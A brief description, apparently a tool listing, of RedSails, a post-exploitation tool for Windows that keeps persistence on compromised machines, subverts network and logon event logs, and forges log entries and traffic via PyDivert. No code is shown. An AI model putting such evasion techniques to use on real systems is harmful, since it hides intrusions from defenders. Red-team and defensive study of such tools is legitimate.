RedSails – Bypassing host based security monitoring and logging
A post-exploitation tool capable of maintaining persistence on a compromised machine, subverting many common host event logs (both network and account logon) and generating false logs / network traffic. Based on [PyDivert] (https://github.com/ffalcinelli/pydivert), a Python binding for WinDivert, a Windows driver that allows user-mode applications to capture/modify/drop network packets sent to/from the Windows network stack. Built […]